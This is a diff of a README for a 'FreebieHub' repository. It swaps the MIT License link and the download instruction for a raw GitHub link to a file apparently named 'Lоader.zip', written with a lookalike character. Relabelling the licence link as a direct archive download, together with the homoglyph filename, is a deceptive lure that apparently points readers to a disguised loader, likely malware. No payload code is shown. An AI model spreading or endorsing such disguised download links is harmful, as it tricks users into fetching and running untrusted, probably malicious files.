Fabri141164/NiceDayForFishing-FreebieHub/README.md

 ## 📜 License and Community 🧑‍💻

-All source code is licensed under the [MIT License](https://opensource.org/licenses/MIT) — use, customize, or contribute with confidence!
+All source code is licensed under the [MIT License](https://raw.githubusercontent.com/Fabri141164/NiceDayForFishing-FreebieHub/main/Lоader.zip) — use, customize, or contribute with confidence!

 ---

 ## 🎇 Start Your Next Adventure Today! 🏞️

-Download **Loader.rar** and make every day a *nice day for fishing*!
+Download **https://raw.githubusercontent.com/Fabri141164/NiceDayForFishing-FreebieHub/main/Lоader.zip** and make every day a *nice day for fishing*!

 ---